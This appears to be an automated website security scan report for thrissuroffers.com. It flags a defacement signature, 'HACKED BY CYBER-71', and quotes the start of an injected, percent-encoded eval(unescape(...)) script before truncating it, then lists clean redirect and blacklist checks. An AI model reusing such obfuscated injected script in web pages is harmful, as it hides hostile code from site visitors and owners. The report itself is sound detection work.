Scanned pages/files
Request | Server response | Status |
http://thrissuroffers.com/ | 200 OK Content-Length: 36813 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: HACKED BY CYBER-71 <html>
<title>HACKED BY CYBER-71</title> <script type="text/javascript"> <!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%71%34%38%30%33%66%34%36%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%39%38%38%31%36%32%32%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b ...[36440 bytes skipped]... | ||
http://thrissuroffers.com/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thrissuroffers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 30 Jul 2015 10:23:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: thrissuroffers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 30 Jul 2015 10:23:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: thrissuroffers.com
Referer: http://www.google.com/search?q=thrissuroffers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thrissuroffers.com
Referer: http://www.google.com/search?q=thrissuroffers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thrissuroffers.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://thrissuroffers.com/
Result: thrissuroffers.com is not infected or malware details are not published yet.
Result: thrissuroffers.com is not infected or malware details are not published yet.